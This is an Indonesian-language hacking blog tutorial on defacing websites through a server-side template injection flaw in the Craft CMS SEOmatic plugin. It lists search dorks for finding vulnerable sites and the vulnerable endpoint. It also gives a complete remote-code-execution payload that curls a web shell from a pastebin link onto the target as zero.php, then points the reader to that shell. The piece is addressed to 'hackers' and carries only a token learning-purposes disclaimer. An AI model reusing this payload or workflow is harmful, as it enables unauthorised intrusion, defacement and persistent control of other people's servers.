Hello para hacker, kali ini saya akan share tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )
Pertama dorking dulu dengan dork ini bro
inurl:/humans.txt intext:"Craft CMS"
intext:SEOmatic filetype:txt
site:*/humans.txt intext:SEOmatic
/* TEAM */ inurl:/humans.txt
Exploit :
/actions/seomatic/meta-container/all-meta-containers?uri=
ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini
jika vuln akan tampil seperti ini
Nah Sudah Menemukan Website Yang Vuln? Selanjutnya Kita Melakukan upload shell dengan RCE Atau Remote Code Excution.
https://site.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/i7VyUpWu\x20%3E\x20zero.php%22));%27)}}
Nah Seperti Ini Kalian Bisa Mengubah Link Pastebin dan Juga extensi Shell kalian Sesuai Selera Masing Masing.
Setelah itu buka acesss Shell kalian di
https://site.com/zero.php
Mungkin sekian dulu dari saya mengenai artikel tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )
NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."
Tag : SSTI, Server Side Template Injection, SSTI TO RCE, SSTI PAYLOAD, Server side template injection tutorial, Server side template injection payload, Server side template injection exploit.
EmoticonEmoticon